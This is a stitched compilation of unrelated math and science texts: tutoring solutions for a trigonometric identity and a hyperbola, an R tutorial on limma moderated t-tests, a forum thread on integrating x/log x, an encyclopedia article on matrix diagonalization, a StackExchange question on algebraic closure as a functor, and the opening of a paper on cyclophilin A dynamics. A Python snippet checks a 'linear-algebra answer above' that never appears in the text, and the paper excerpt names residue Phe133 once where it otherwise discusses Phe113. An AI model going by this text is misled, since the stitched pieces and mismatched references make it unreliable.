Joseph B.: We will start with the left side of the equation and work it through to equivalency. First we use the double angle identity $$\cos(2x) = \cos^{2}(x)-\sin^{2}(x)$$, rearranged to $$\sin^{2}(x) = \cos^{2}(x)-\cos(2x)$$, to replace the $$\sin^{2}(x)$$: $$1-[\cos^{2}(x)-\cos(2x)]$$ Then, using another double angle identity, $$\cos(2x) = 2\cos^{2}(x) - 1$$, we make another substitution: $$1 -[\cos^{2}(x) - (2\cos^{2}(x) - 1)]$$ Redistribute and combine like terms: $$1-[\cos^{2}(x) -2\cos^{2}(x) +1]$$ $$1-[-\cos^{2}(x) +1]$$ $$\cos^{2}(x)$$ Thus $$1 -\sin^{2}(x) = \cos^{2}(x)$$

### Subject: Calculus

Question: Find the foci, vertices, center, eccentricity, and asymptotes of the conic section: $$9x^{2} - 16y^{2} -36x -32y - 124 = 0$$ (This is a calculus III problem)

Joseph B.: First we want to rearrange the equation into the standard form of a hyperbola: $$\frac{(x-h)^{2}}{a^{2}} - \frac{(y-k)^{2}}{b^{2}} = 1$$ To do so we reorganize the equation: $$9x^{2} - 36x -16y^{2} - 32y = 124$$ From here we factor, then complete the square: $$9(x^{2} - 4x) -16 (y^{2} +2y) = 124$$ $$9(x-2)^{2} - 16(y+1)^{2} = 124 + 36 - 16 = 144$$ Dividing through by 144 gives $$\frac{(x-2)^{2}}{16} - \frac{(y+1)^{2}}{9} = 1$$ Looking at this equation we can see that the center is at (h, k) = (2, -1). The vertices are a distance $$a = 4$$ away, symmetric about the center along the x-axis: (-2, -1) and (6, -1). The foci are a distance $$c = \sqrt{a^{2}+b^{2}} = 5$$ away, symmetric about the center: (-3, -1) and (7, -1). The eccentricity is $$\frac{c}{a} = \frac{\sqrt{a^{2}+b^{2}}}{a} = \frac{5}{4}$$ Lastly, the asymptotes satisfy $$y - k = \pm\frac{b}{a}(x-h)$$, which gives $$y = \frac{3x}{4}-\frac{5}{2}$$ and $$y = \frac{1}{2} - \frac{3x}{4}$$
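As a quick numerical sanity check of the linear-algebra answer above, the system can be handed to NumPy's solver (a sketch; NumPy is assumed):

```python
import numpy as np

# Coefficient matrix and right-hand side of the system
#   x + 2y = 1,  3x + 2y + 4z = 7,  -2x + y - 2z = -1
A = np.array([[1, 2, 0],
              [3, 2, 4],
              [-2, 1, -2]], dtype=float)
b = np.array([1, 7, -1], dtype=float)

solution = np.linalg.solve(A, b)
print(solution)  # approximately [-1, 1, 2], matching x = -1, y = 1, z = 2
```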
http://genomicsclass.github.io/book/pages/hierarchical_models.html
## Hierarchical Models

In this section, we use mathematical theory to describe an approach that has become widely applied in the analysis of high-throughput data. The general idea is to build a hierarchical model with two levels. One level describes variability across samples/units, and the other describes variability across features. This is similar to the baseball example, in which the first level described variability across players and the second described the randomness in the success of one player. The first level of variation is accounted for by all the models and approaches we have described here, for example the model that leads to the t-test. The second level provides power by permitting us to "borrow" information from all features to inform the inference performed on each one.

Here we describe one specific case that is currently the most widely used approach to inference with gene expression data. It is the model implemented by the limma Bioconductor package. This idea has been adapted to develop methods for other data types, such as RNA-seq, by, for example, edgeR and DESeq2. The limma package provides an alternative to the t-test that greatly improves power by modeling the variance. While in the baseball example we modeled averages, here we model variances. Modeling variances requires more advanced math, but the concepts are practically the same. We motivate and demonstrate the approach with an example.

Here is a volcano plot showing effect sizes and p-values from applying a t-test to data from an experiment running six replicated samples, with 16 genes artificially made to be different in two groups of three samples each. These 16 genes are the only genes for which the alternative hypothesis is true. In the plot they are shown in blue.
```r
library(SpikeInSubset)  ## Available from Bioconductor
data(rma95)
library(genefilter)
fac <- factor(rep(1:2, each=3))
tt <- rowttests(exprs(rma95), fac)
smallp <- with(tt, p.value < .01)
spike <- rownames(rma95) %in% colnames(pData(rma95))
cols <- ifelse(spike, "dodgerblue", ifelse(smallp, "red", "black"))
with(tt, plot(-dm, -log10(p.value), cex=.8, pch=16, xlim=c(-1,1),
              ylim=c(0,4.5), xlab="difference in means", col=cols))
abline(h=2, v=c(-.2,.2), lty=2)
```

We cut off the range of the y-axis at 4.5, but there is one blue point with a p-value smaller than $10^{-6}$. Two findings stand out from this plot. The first is that only one of the positives would be found to be significant with a standard 5% FDR cutoff:

```r
sum(p.adjust(tt$p.value, method="BH")[spike] < 0.05)
## [1] 1
```

This of course has to do with the low power associated with a sample size of three in each group. The second finding is that if we forget about inference and simply rank the genes based on the size of the t-statistic, we obtain many false positives in any ranked list of size larger than 1. For example, six of the top 10 genes ranked by t-statistic are false positives:

```r
table(top10 = rank(tt$p.value) <= 10, spike)  # t-statistic and p-value ranks are the same
##        spike
## top10   FALSE  TRUE
##   FALSE 12604    12
##   TRUE      6     4
```

In the plot we notice that these are mostly genes for which the effect size is relatively small, implying that the estimated standard error is small. We can confirm this with a plot:

```r
tt$s <- apply(exprs(rma95), 1, function(row)
  sqrt(.5 * (var(row[1:3]) + var(row[4:6]))))
with(tt, plot(s, -log10(p.value), cex=.8, pch=16, log="x",
              xlab="estimate of standard deviation", col=cols))
```

Here is where a hierarchical model can be useful. If we can make an assumption about the distribution of these variances across genes, then we can improve estimates by "adjusting" estimates that are "too small" according to this distribution.
In a previous section we described how the F-distribution approximates the distribution of the observed variances. Because we have thousands of data points, we can actually check this assumption and also estimate the parameters $s_0$ and $d_0$. This particular approach is referred to as empirical Bayes, because it can be described as using the data (empirical) to build the prior distribution (Bayesian approach).

Now we apply what we learned with the baseball example to the standard error estimates. As before, we have an observed value for each gene $s_g$, a sampling distribution, and a prior distribution. We can therefore compute a posterior distribution for the variance $\sigma^2_g$ and obtain the posterior mean. You can see the details of the derivation in this paper. As in the baseball example, the posterior mean shrinks the observed variance $s_g^2$ towards the global variance $s_0^2$, and the weights depend on the sample size through the degrees of freedom $d$ and, in this case, on the shape of the prior distribution through $d_0$.

In the plot above we can see how the variance estimates shrink for 40 genes (code not shown). An important aspect of this adjustment is that genes having a sample standard deviation close to 0 are no longer close to 0 (they shrink towards $s_0$). We can now create a version of the t-test that, instead of the sample standard deviation, uses this posterior mean or "shrunken" estimate of the variance. We refer to these as moderated t-tests. Once we do this, the improvements can be seen clearly in the volcano plot:

```r
library(limma)
fit <- lmFit(rma95, model.matrix(~ fac))
ebfit <- ebayes(fit)
limmares <- data.frame(dm = coef(fit)[, "fac2"],
                       p.value = ebfit$p.value[, "fac2"])
with(limmares, plot(dm, -log10(p.value), cex=.8, pch=16, col=cols,
                    xlab="difference in means", xlim=c(-1,1), ylim=c(0,5)))
abline(h=2, v=c(-.2,.2), lty=2)
```

The number of false positives in the top 10 is now reduced to 2.
```r
table(top10 = rank(limmares$p.value) <= 10, spike)
##        spike
## top10   FALSE  TRUE
##   FALSE 12608     8
##   TRUE      2     8
```
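For reference, the shrunken variance used by the moderated t-test has a simple closed form. In the parameterization of the limma paper cited above (with $d_g$ the residual degrees of freedom for gene $g$; this formula comes from that paper, not from the code shown here), the posterior mean is

```latex
\tilde{s}^2_g = \frac{d_0 s_0^2 + d_g s_g^2}{d_0 + d_g}
```

a weighted average of the prior variance $s_0^2$ and the sample variance $s_g^2$, with weights proportional to $d_0$ and $d_g$. When $d_0 \rightarrow \infty$ all genes share the single variance $s_0^2$, and when $d_0 = 0$ the estimate reduces to the gene-specific $s_g^2$.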
https://www.physicsforums.com/threads/integrating-a-curious-function.548098/
# Homework Help: Integrating a curious function

1. Nov 7, 2011

### zip37

1. The problem statement, all variables and given/known data

I'm having some trouble trying to integrate the following function.

2. Relevant equations

$\int \frac{x}{\log x}\,dx$

3. The attempt at a solution

I have tried integration by parts but I get stuck with harder integrals. What I'd like to know is whether this function can be integrated or not. :) I've tried using Wolfram Alpha for this particular case but my math level is way below the explanations given there.

2. Nov 7, 2011

### Ray Vickson

Do you mean that the integrand is $f(x) = x/ \log(x)$ or do you mean $f(x) = [x/ \log(x)]$, where $[\cdots]$ is the "greatest-integer function"? If you mean the former, Maple expresses the result in terms of the non-elementary function Ei (the exponential integral): $$\mbox{Ei}(y) = P\int_{-\infty}^y \frac{e^t}{t} dt,$$ with P denoting the principal value integral.

RGV

3. Nov 7, 2011

### zip37

Yes, I meant the former; the integrand is x/log x. Thank you for the information! I'm reading up on other websites about what this Ei function is in more detail.

4. Nov 7, 2011

### Matterwave

Are you integrating that over the whole real line? In that case you really do have a principal value integral, because you are moving through a pole in the integrand.

5. Nov 8, 2011

### kmacinto

Integration by parts is the way I would go. Try both functions for u. Ya got a 50% chance that your 1st choice is the correct one :)

6. Nov 8, 2011

### Ray Vickson

Integration by parts is NOT the way to go. Your second comment makes no sense: the OP is 100% sure of what he/she means. Anyway, the second form f(x) = [x/log(x)] (where [ ] = greatest-integer function) will not have an analytically expressible integral---think about why not.

RGV
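Ray Vickson's answer can be made concrete: the substitution $u = \log x$ turns the integral into $\int e^{2u}/u \, du$, so one antiderivative of $x/\log x$ is $\mbox{Ei}(2 \log x)$. This is easy to check numerically (a sketch assuming SciPy, whose scipy.special.expi implements Ei):

```python
import numpy as np
from scipy.special import expi  # the exponential integral Ei

# Check d/dx Ei(2*log(x)) = x/log(x) at a sample point x > 1,
# staying away from the singularity of the integrand at x = 1.
x = 3.0
h = 1e-6
numeric_derivative = (expi(2 * np.log(x + h)) - expi(2 * np.log(x - h))) / (2 * h)
print(numeric_derivative, x / np.log(x))  # the two values agree closely
```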
https://stoneswww.academickids.com/encyclopedia/index.php/Diagonalizable_matrix
# Diagonalizable matrix

In linear algebra, a square matrix A is called diagonalizable if it is similar to a diagonal matrix, i.e. if there exists an invertible matrix P such that $P^{-1}AP$ is a diagonal matrix. If V is a finite-dimensional vector space, then a linear map $T : V \to V$ is called diagonalizable if there exists a basis of V with respect to which T is represented by a diagonal matrix. Diagonalization is the process of finding a corresponding diagonal matrix for a diagonalizable matrix or linear map.

Diagonalizable matrices and maps are of interest because diagonal matrices are especially easy to handle: their eigenvalues and eigenvectors are known, and one can raise a diagonal matrix to a power by simply raising the diagonal entries to that same power. The fundamental fact about diagonalizable maps and matrices is expressed by the following:

• An n-by-n matrix A over the field F is diagonalizable if and only if the sum of the dimensions of its eigenspaces is equal to n, which is the case if and only if there exists a basis of $F^n$ consisting of eigenvectors of A. If such a basis has been found, one can form the matrix P having these basis vectors as columns, and $P^{-1}AP$ will be a diagonal matrix. The diagonal entries of this matrix are the eigenvalues of A.

• A linear map $T : V \to V$ is diagonalizable if and only if the sum of the dimensions of its eigenspaces is equal to dim(V), which is the case if and only if there exists a basis of V consisting of eigenvectors of T. With respect to such a basis, T will be represented by a diagonal matrix. The diagonal entries of this matrix are the eigenvalues of T.

Another characterization: a matrix or linear map is diagonalizable over the field F if and only if its minimal polynomial is a product of distinct linear factors over F. The following sufficient (but not necessary) condition is often useful.

• An n-by-n matrix A is diagonalizable over the field F if it has n distinct eigenvalues in F, i.e.
if its characteristic polynomial has n distinct roots in F.

• A linear map $T : V \to V$ with n = dim(V) is diagonalizable if it has n distinct eigenvalues, i.e. if its characteristic polynomial has n distinct roots in F.

As a rule of thumb, over C almost every matrix is diagonalizable. More precisely: the set of complex n-by-n matrices that are not diagonalizable over C, considered as a subset of $C^{n \times n}$, is a null set with respect to the Lebesgue measure. One can also say that the diagonalizable matrices form a dense subset with respect to the Zariski topology: the complement lies inside the set where the discriminant of the characteristic polynomial vanishes, which is a hypersurface. From this, density in the usual (strong) topology given by a norm also follows. The same is not true over R. As n increases, it becomes (in some sense) less and less likely that a randomly selected real matrix is diagonalizable over R.

## Examples

### How to diagonalize a matrix

Consider the matrix

$$A=\begin{bmatrix} 1 & 2 & 0 \\ 0 & 3 & 0 \\ 2 & -4 & 2 \end{bmatrix}$$

This matrix has eigenvalues

$$\lambda_1 = 3, \quad \lambda_2 = 2, \quad \lambda_3 = 1.$$

So A is a 3-by-3 matrix with 3 distinct eigenvalues; therefore it is diagonalizable. If we want to diagonalize A, we need to compute the corresponding eigenvectors. They are

$$v_1 = \begin{bmatrix} -1 \\ -1 \\ 2 \end{bmatrix}, \quad v_2 = \begin{bmatrix} 0 \\ 0 \\ 1 \end{bmatrix}, \quad v_3 = \begin{bmatrix} -1 \\ 0 \\ 2 \end{bmatrix}.$$

One can easily check that $A v_k = \lambda_k v_k$.
Now, let P be the matrix with these eigenvectors as its columns:

$$P= \begin{bmatrix} -1 & 0 & -1 \\ -1 & 0 & 0 \\ 2 & 1 & 2 \end{bmatrix}.$$

Then P diagonalizes A, as a simple computation confirms:

$$P^{-1}AP = \begin{bmatrix} -1 & 0 & -1 \\ -1 & 0 & 0 \\ 2 & 1 & 2 \end{bmatrix}^{-1} \begin{bmatrix} 1 & 2 & 0 \\ 0 & 3 & 0 \\ 2 & -4 & 2 \end{bmatrix} \begin{bmatrix} -1 & 0 & -1 \\ -1 & 0 & 0 \\ 2 & 1 & 2 \end{bmatrix} = \begin{bmatrix} 3 & 0 & 0 \\ 0 & 2 & 0 \\ 0 & 0 & 1\end{bmatrix}.$$

Note that the eigenvalues $\lambda_k$ appear in the diagonal matrix.

### Matrices that are not diagonalizable

Some real matrices are not diagonalizable over the reals. Consider for instance the matrix

$$B = \begin{bmatrix} 0 & 1 \\ -1 & 0 \end{bmatrix}.$$

The matrix B does not have any real eigenvalues, so there is no real matrix Q such that $Q^{-1}BQ$ is a diagonal matrix. However, we can diagonalize B if we allow complex numbers. Indeed, if we take

$$Q = \begin{bmatrix} 1 & \textrm{i} \\ \textrm{i} & 1 \end{bmatrix},$$

then $Q^{-1}BQ$ is diagonal.

However, there are also matrices that are not diagonalizable even if complex numbers are used. This happens if the geometric and algebraic multiplicities of an eigenvalue do not coincide. For instance, consider

$$C = \begin{bmatrix} 0 & 1 \\ 0 & 0 \end{bmatrix}.$$

This matrix is not diagonalizable: there is no matrix U such that $U^{-1}CU$ is a diagonal matrix. Indeed, C has one eigenvalue (namely zero), and this eigenvalue has algebraic multiplicity 2 and geometric multiplicity 1.

## An application

Diagonalization can be used to compute the powers of a matrix A efficiently, provided the matrix is diagonalizable. Suppose we have found that $P^{-1}AP = D$ is a diagonal matrix. Then $A^k = (PDP^{-1})^k = PD^kP^{-1}$, and the latter is easy to calculate since it only involves the powers of a diagonal matrix.
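The worked example above is easy to check numerically (a sketch assuming NumPy; the matrices are copied from the example):

```python
import numpy as np

# A and its eigenvector matrix P from the worked example above.
A = np.array([[1, 2, 0],
              [0, 3, 0],
              [2, -4, 2]], dtype=float)
P = np.array([[-1, 0, -1],
              [-1, 0, 0],
              [2, 1, 2]], dtype=float)

D = np.linalg.inv(P) @ A @ P
print(np.round(D, 10))  # diag(3, 2, 1): the eigenvalues on the diagonal

# Powers via diagonalization: A^5 = P D^5 P^{-1}
D_clean = np.diag(np.diag(D))  # drop tiny numerical off-diagonal noise
A5 = P @ np.linalg.matrix_power(D_clean, 5) @ np.linalg.inv(P)
print(np.allclose(A5, np.linalg.matrix_power(A, 5)))  # True
```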
For example, consider the following matrix:

$$M =\begin{bmatrix}a & b-a \\ 0 & b \end{bmatrix}.$$

Calculating the various powers of M reveals a surprising pattern:

$$M^2 = \begin{bmatrix}a^2 & b^2-a^2 \\ 0 & b^2 \end{bmatrix},\quad M^3 = \begin{bmatrix}a^3 & b^3-a^3 \\ 0 & b^3 \end{bmatrix},\quad M^4 = \begin{bmatrix}a^4 & b^4-a^4 \\ 0 & b^4 \end{bmatrix},\quad \ldots$$

The above phenomenon can be explained by diagonalizing M. To accomplish this, we need a basis of $\mathbf{R}^2$ consisting of eigenvectors of M. One such eigenvector basis is given by

$$\mathbf{u}=\begin{bmatrix} 1 \\ 0 \end{bmatrix}=\mathbf{e}_1,\qquad \mathbf{v}=\begin{bmatrix} 1 \\ 1 \end{bmatrix}=\mathbf{e}_1+\mathbf{e}_2,$$

where $\mathbf{e}_i$ denotes the standard basis of $\mathbf{R}^2$. The reverse change of basis is given by

$$\mathbf{e}_1 = \mathbf{u},\qquad \mathbf{e}_2 = \mathbf{v}-\mathbf{u}.$$

Straightforward calculations show that

$$M\mathbf{u} = a\,\mathbf{u},\qquad M\mathbf{v} = b\,\mathbf{v}.$$

Thus, a and b are the eigenvalues corresponding to u and v, respectively. By linearity of matrix multiplication, we have that

$$M^n \mathbf{u} = a^n\, \mathbf{u},\qquad M^n \mathbf{v}=b^n\,\mathbf{v}.$$

Switching back to the standard basis, we have

$$M^n \mathbf{e}_1 = M^n \mathbf{u} = a^n \mathbf{e}_1,$$

$$M^n \mathbf{e}_2 = M^n (\mathbf{v}-\mathbf{u}) = b^n \mathbf{v} - a^n\mathbf{u} = (b^n-a^n) \mathbf{e}_1+b^n\mathbf{e}_2.$$

The preceding relations, expressed in matrix form, are

$$M^n = \begin{bmatrix}a^n & b^n-a^n \\ 0 & b^n \end{bmatrix},$$

thereby explaining the above phenomenon.
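The closed form for $M^n$ derived above can likewise be spot-checked numerically (a sketch assuming NumPy, with a = 2, b = 5, n = 3 chosen arbitrarily):

```python
import numpy as np

a, b, n = 2.0, 5.0, 3
M = np.array([[a, b - a],
              [0.0, b]])

Mn = np.linalg.matrix_power(M, n)
expected = np.array([[a**n, b**n - a**n],
                     [0.0, b**n]])
print(np.allclose(Mn, expected))  # True: M^3 = [[8, 117], [0, 125]]
```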
https://math.stackexchange.com/questions/3300131/can-taking-algebraic-closure-be-made-into-a-functor
# Can “Taking algebraic closure” be made into a functor?

I am confused by the problem in the title. To be exact, the problem is: Does there exist a functor $$A:\mathsf{Field}\to \mathsf{Field}$$ together with a natural transformation from the identity functor $$\iota: \operatorname{id}\to A$$ such that for each $$F$$, $$A(F)$$ is an algebraic closure of $$F$$ through $$\iota_F:F\to A(F)$$? This is less easy than it appears at first glance. Let me explain. Note that the existence of algebraic closures only ensures that there exists a map from $$\operatorname{Obj}(\mathsf{Field})$$ to itself. Since the "extension" property is not unique, it is not generally true that we can extend the map to $$\operatorname{Mor}(\mathsf{Field})$$ for an arbitrary choice of algebraic closures. 1. For example, consider the fields $$\begin{array}{ccc} \mathbb{Q}[\sqrt[3]{2}, \sqrt{2}] &\to & \mathbb{Q}[\omega\sqrt[3]{2}, \sqrt{2}]\\ \uparrow &&\uparrow \\ \mathbb{Q}[\sqrt[3]{2}] & \to & \mathbb{Q}[\omega\sqrt[3]{2}] \end{array}$$ If we choose the algebraic closures of $$\mathbb{Q}[\sqrt[3]{2}, \sqrt{2}]$$, $$\mathbb{Q}[\omega\sqrt[3]{2}, \sqrt{2}]$$ and $$\mathbb{Q}[\omega\sqrt[3]{2}]$$ by inclusion into $$\overline{\mathbb{Q}}$$, and the closure of $$\mathbb{Q}[\sqrt[3]{2}]\to \overline{\mathbb{Q}}$$ by $$\sqrt[3]{2}\mapsto \omega\sqrt[3]{2}$$, then we cannot extend these choices to a well-defined functor. A similar problem exists for transcendental extensions, for example, a square like this $$\begin{array}{ccc} \mathbb{C}[X,Y] &\to & \mathbb{C}[X^2,Y]\\ \uparrow &&\uparrow \\ \mathbb{C}[X] & \to & \mathbb{C}[X^2] \end{array}$$ A reasonable method to avoid the phenomenon above is as follows. Fix an algebraically closed field $$F$$ and take all of its subfields as a "skeleton"; then, for every field whose algebraic closure is isomorphic to $$F$$, fix an isomorphism onto a subfield of $$F$$.
The isomorphism class of an algebraic closure is completely determined by its characteristic and its transcendence degree over the prime field $$\mathbb{Q}$$ or $$\mathbb{F}_p$$. 2. Now the problem is how to naturally choose extensions for endomorphisms. But unfortunately, the choice is fragile. For instance, consider the following diagram $$\begin{array}{ccccl} \mathbb{Q}[\sqrt{3}, \sqrt{2}] &\to & \mathbb{Q}[\sqrt{3}, \sqrt{2}] &: &\sqrt{3}\mapsto -\sqrt{3},\sqrt{2}\mapsto \pm \sqrt{2}\\ \uparrow &&\uparrow \\ \mathbb{Q}[\sqrt{3}] & \to & \mathbb{Q}[\sqrt{3}] &:&\sqrt{3}\mapsto -\sqrt{3} \end{array}$$ There is no suitable choice such that $$\begin{array}{ccccl} \overline{\mathbb{Q}} &\to & \overline{\mathbb{Q}} &: &\sqrt{3}\mapsto -\sqrt{3},\sqrt{2}\mapsto \pm \sqrt{2}\\ \parallel &&\parallel \\ \overline{\mathbb{Q}}& \to & \overline{\mathbb{Q}} &:&\sqrt{3}\mapsto -\sqrt{3} \end{array}$$ commutes for both $$\pm=+$$ and $$\pm=-$$.

• I am sure that this came up somewhere recently. Either here or on MathOverflow. Maybe not in this exact formulation, but the essence was the same. – Asaf Karagila Jul 23 at 8:44
• A simple example of why this is not possible is also given in (ncatlab.org/nlab/show/algebraically+closed+field). One considers the equalizer diagram $\mathbb{R} \to \mathbb{C} \xrightarrow[\text{conj}]{\text{id}} \mathbb{C}$ and sees that it would not extend to a commutative diagram under such a functor. – Parthiv Basu Jul 24 at 0:47

No, this is not possible. For instance, let $$K$$ be any field with an automorphism $$f:K\to K$$ whose order is finite and greater than $$2$$. Then $$A(f):A(K)\to A(K)$$ would be an automorphism of the same order extending $$f$$. But no such automorphism exists: by the Artin–Schreier theorem, any finite-order automorphism of an algebraically closed field has order at most $$2$$. Or, without using any big theorems, you can find problems just by looking at finite extensions.
For instance, if $$f$$ is the Frobenius automorphism of $$\mathbb{F}_{p^2}$$, then $$A(f)$$ is an extension of $$f$$ to an algebraic closure which still has order $$2$$. Since $$\mathbb{F}_{p^4}$$ is normal over $$\mathbb{F}_{p}$$, $$A(f)$$ restricts to an automorphism of $$\mathbb{F}_{p^4}$$, which must be the Frobenius squared in order to have order $$2$$. But the Frobenius squared does not restrict to $$f$$ on $$\mathbb{F}_{p^2}$$, so this is a contradiction.
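The finite-field counterexample can be sanity-checked with elementary modular arithmetic: the Frobenius $$x \mapsto x^p$$ on $$\mathbb{F}_{p^n}$$ satisfies $$\varphi^k = \mathrm{id}$$ exactly when $$p^k \equiv 1 \pmod{p^n - 1}$$, so its order as an automorphism equals the multiplicative order of $$p$$ modulo $$p^n - 1$$. A small sketch (plain Python, no field arithmetic needed):

```python
def mult_order(g, m):
    """Smallest k >= 1 with g**k congruent to 1 (mod m)."""
    k, acc = 1, g % m
    while acc != 1:
        acc = (acc * g) % m
        k += 1
    return k

p = 3
# Order of the Frobenius x -> x^p as an automorphism:
assert mult_order(p, p**2 - 1) == 2   # f = Frobenius of F_{p^2} has order 2
assert mult_order(p, p**4 - 1) == 4   # Frobenius of F_{p^4} has order 4
# The only order-2 element of Gal(F_{p^4}/F_p) is the Frobenius squared,
# x -> x^{p^2}; on F_{p^2} every element satisfies x^{p^2} = x, so it
# restricts to the identity, not to f -- the contradiction in the answer:
assert p**2 % (p**2 - 1) == 1
```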
https://www.nature.com/articles/s42004-019-0136-1?error=cookies_not_supported&code=f9fc15e7-1fe5-426a-896f-c956514536fb
## Introduction

A major goal of modern molecular biophysics is to clarify the connection between protein motions and enzymatic catalysis1,2,3. A wide range of experimental methods, e.g. neutron scattering, X-ray crystallography, NMR, or vibrational spectroscopy, have been used to characterize internal protein motions occurring on femtosecond to second timescales4,5. While there is broad consensus that protein motions are implicated in catalysis, there is much debate around the role of conformational changes occurring on a millisecond timescale, and several studies have linked changes in millisecond protein motions with changes in enzymatic function6,7,8,9. However, it remains unclear whether such motions have a causal link to catalysis, or are merely a manifestation of the inherent flexibility of proteins over a broad range of timescales. There have been vigorous debates about the meaning of dynamics in the context of enzymatic catalysis10,11,12. In the framework of transition state theory, the reaction rate is given by Eq. 1:

$$k = A(T)e^{ - \Delta G^\ddagger (T)/RT}$$ (1)

where T is the temperature and R the gas constant. The pre-exponential term A(T) includes contributions from non-statistical motions such as re-crossing or tunnelling. The exponential term involves the activation free energy of the chemical step $$\Delta G^\ddagger (T)$$. If transitions between reactant states are fast compared to the time scale of the chemical reaction, $$\Delta G^\ddagger \left( T \right)$$ is the free energy difference between the thermally equilibrated ensembles describing the reactant and transition states13,14. Non-statistical motions described by A(T) have typically been found to make a small contribution to rate constants with respect to the exponential term that involves equilibrium fluctuations of the protein and solvent degrees of freedom15. The current work is concerned with the connection between rates of thermally equilibrated motions and catalysis in enzymes.
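As a quick numerical illustration of Eq. 1, the sketch below evaluates the rate for a given barrier. Note one assumption: the text leaves A(T) general, so the common Eyring choice A(T) = kBT/h is used here purely for illustration.

```python
import math

KB = 1.380649e-23    # Boltzmann constant, J/K
H  = 6.62607015e-34  # Planck constant, J*s
R  = 8.314462618     # gas constant, J/(mol*K)

def tst_rate(dG_kcal_per_mol, T=300.0):
    """Eq. 1 with the Eyring prefactor kB*T/h (an illustrative assumption)."""
    dG = dG_kcal_per_mol * 4184.0            # kcal/mol -> J/mol
    return (KB * T / H) * math.exp(-dG / (R * T))

# A ~20 kcal/mol barrier (like the uncatalyzed isomerization discussed
# later) gives a rate on the order of 1e-2 s^-1; lowering the barrier by
# ~6 kcal/mol speeds the reaction up by a factor of roughly 2e4.
print(f"{tst_rate(20.1):.2e} s^-1")
```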
Specifically, the focus is on clarifying the nature of the protein motions implicated in catalysis for the well-studied enzyme cyclophilin A (CypA). CypA is a member of the cyclophilin family of peptidyl-prolyl isomerases, which catalyzes the cis/trans isomerization of amide groups in proline residues16. CypA plays an essential role in protein folding and regulation, gene expression, cellular signaling and the immune system. Notably, CypA is involved in the infectious activity and the viral replication of HIV-117. Accordingly, CypA has been the subject of structure-based drug design efforts for decades18,19,20. Because of its significance as a medical target, the catalytic mechanism of CypA has been the subject of extensive studies2,3,21,22,23,24,25,26,27,28,29,30. Computational studies have shown that the speedup of the cis/trans isomerization rate of the prolyl peptide bond is a result of preferential transition state stabilization through selective hydrogen bonding interactions in the active site of CypA26,30. Figure 1a depicts key interactions between the substrate and active site residues, whereas Fig. 1b highlights the relevant ω angle of the substrate used to track the cis/trans isomerization reaction. Elegant NMR relaxation experiments by Eisenmesser et al.27 have also characterized the existence of intrinsic motions in apo CypA that couple a ‘major’ state M with a ‘minor’ conformational state m with a rate constant $$k_{M \to m}$$ = 60 s−1. Fraser et al. later used ambient temperature X-ray crystallographic data to determine a high-resolution structure of this CypA state m, revealing an interconversion pathway with the ‘major’ state M that involves coupled rotations of a network of side-chains involving residues Ser99, Phe113, Met61, and Arg55. To establish the relevance of this ‘minor’ state m to catalysis, the distal residue Ser99 was mutated to Thr99 (now only referred to as ST).
Further X-ray and NMR measurements on the free enzyme confirmed that the ST mutant increased the population of the m state, while decreasing the conversion rate $$k_{M \to m}$$ to 1 s−1 31. Remarkably, additional NMR experiments established that this 60-fold decrease in conversion rate between M and m states in the ST mutant correlates with a ca. 70-fold decrease in bidirectional isomerization rate ($$k_{iso} = k_{cis \to trans} + k_{trans \to cis}$$) of a model substrate with respect to wild-type (WT). The effect is comparable to rate decreases observed for mutations of key active site residues such as Arg5531. More recently, two further mutants were reported in an effort to rescue the lost enzymatic activity of ST. These mutations were S99T and C115S (now only referred to as STCS), or S99T, C115S, and I97V (now only referred to as STCSIV). The two newly introduced mutants recover the enzyme activity to some extent, which correlates with an increase in $$k_{M \to m}$$ values32. While this body of work suggested a link between millisecond time scale motions and catalysis in enzymes, there is currently no detailed mechanistic explanation for the decreased catalytic activity of the mutants. The present study uses a variety of extensive equilibrium and biased molecular dynamics (MD) simulations to clarify the link between catalytic activity and rates of molecular motions of CypA in wild-type and the three mutant variants. We show that the MD simulations reproduce well X-ray crystallography derived evidence for a shift in populations of major and minor active site conformations between the wild-type and mutant forms. Remarkably exchange between these active site conformations occurs at a rate that is five to six orders of magnitude faster than previously proposed. We show that the decrease in catalytic activity of the CypA mutants with respect to wild-type may be explained by changes in motions of residue Phe133 on a ns–μs timescale. 
Therefore, millisecond time scale motions previously described in the literature may not be necessary to explain allosteric effects in cyclophilins.

## Results

### Major and minor conformations exchange on ns timescales

Fraser et al. have described the proposed ‘major’ and ‘minor’ states according to sets of values of χ1 (Phe113, Ser/Thr99), χ2 (Met61) and χ3 (Arg55) angles31,33. These dihedrals, as well as the side-chain dihedrals χ1 of Ile97 and Cys115, were used to construct a Markov state model (MSM) to obtain quantitative information on thermodynamic and kinetic properties of the WT protein and the three experimentally studied mutants. The consistency of the MSMs was evaluated using standard protocols and by assessing the robustness of the findings with respect to a range of model parameters (see Supplementary Figures 1–3 and Supplementary Tables 1 and 2). In the case of WT the accuracy of the MSM was additionally evaluated by back-calculation of previously reported NMR observables34. The MSM yields predictions of observables that show broadly similar accuracy to that of the NMR ensembles of Chi et al.35 and Otter et al.36 (see Supplementary Figure 4). Thus the simulations were deemed sufficiently consistent with experimental data to warrant further analyses. The X-ray structures of the key active site dihedrals in their dominantly populated states (if multiple occupancy is observed) are shown in Fig. 2a for WT and ST, Fig. 2b for WT and STCS, and Fig. 2c for WT and STCSIV mutants. The most striking feature of the ‘major’ and ‘minor’ conformations is the rotameric state of χ1 of Phe113 from the crystal structures, which in the ‘minor’ conformation is χ1 ≈ −60°. This will be referred to as the ‘out’ conformation. In contrast, in the ‘major’ state χ1 ≈ 60°, which will be referred to as the ‘in’ conformation. In Fig. 2d–f, crystal structure occupancies for Phe113 χ1 are compared to the MSM-derived dihedral distributions for WT and ST, WT and STCS, and WT and STCSIV, respectively.
The simulations suggest that in apo WT the Phe113 ‘in’ and ‘out’ orientations are equally likely, which is consistent with the relatively similar occupancies of the two rotamers in the X-ray structure (occupancies = 0.63 and 0.37, respectively)31. In apo ST there is a significant population shift towards the ‘out’ orientation (χ1 = −60°), and the ‘in’ orientation has a marginal population (ca. 1%), see Fig. 2d. This agrees with the X-ray structure of ST, where only the Phe113 ‘out’ rotamer is observed (occupancy = 1.0). This also agrees with J-coupling measurements that show the dominant Phe113 χ1 angle is ca. −60° in ST31. In the STCS and STCSIV mutants the ‘in’ rotamer is also destabilized with respect to wild-type, but to a lesser extent (populations of ca. 16% and 17%, respectively). Though only one ‘out’ rotamer was resolved in the X-ray structure of STCS (Fig. 2e), a major ‘out’ and a minor distorted ‘in’ rotamer (χ1 = +31°, occupancy 0.21) are observed in the X-ray structure of STCSIV (Fig. 2f). Rotamers of other side-chain dihedrals of the key residues for WT and all mutants are found in 